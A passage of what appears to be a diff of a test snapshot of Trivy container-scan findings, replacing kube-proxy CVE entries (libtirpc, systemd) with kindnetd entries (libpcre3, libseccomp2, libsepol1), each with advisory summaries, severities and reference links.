"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc-common", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", - }, - { - "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", + "references": [ + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", + ], + }, + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc3", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + }, + { + "type": "URL", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9893", + "installedVersion": "2.3.3-4", + "packageName": "libseccomp2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", + "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", + "https://access.redhat.com/errata/RHSA-2019:3624", + "https://access.redhat.com/security/cve/CVE-2019-9893", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", + "https://github.com/seccomp/libseccomp/issues/139", + "https://linux.oracle.com/cve/CVE-2019-9893.html", + "https://linux.oracle.com/errata/ELSA-2019-3624.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", + "https://seclists.org/oss-sec/2019/q1/179", + "https://security.gentoo.org/glsa/201904-18", + "https://ubuntu.com/security/notices/USN-4001-1", + "https://ubuntu.com/security/notices/USN-4001-2", + "https://usn.ubuntu.com/4001-1/", + "https://usn.ubuntu.com/4001-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-9893", + "https://www.openwall.com/lists/oss-security/2019/03/15/1", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "libseccomp: incorrect generation of syscall filters in libseccomp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2019-9893", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://access.redhat.com/errata/RHSA-2019:3624", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2019-9893", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://github.com/seccomp/libseccomp/issues/139", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://seclists.org/oss-sec/2019/q1/179", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://security.gentoo.org/glsa/201904-18", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://ubuntu.com/security/notices/USN-4001-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://ubuntu.com/security/notices/USN-4001-2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://usn.ubuntu.com/4001-1/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://usn.ubuntu.com/4001-2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": 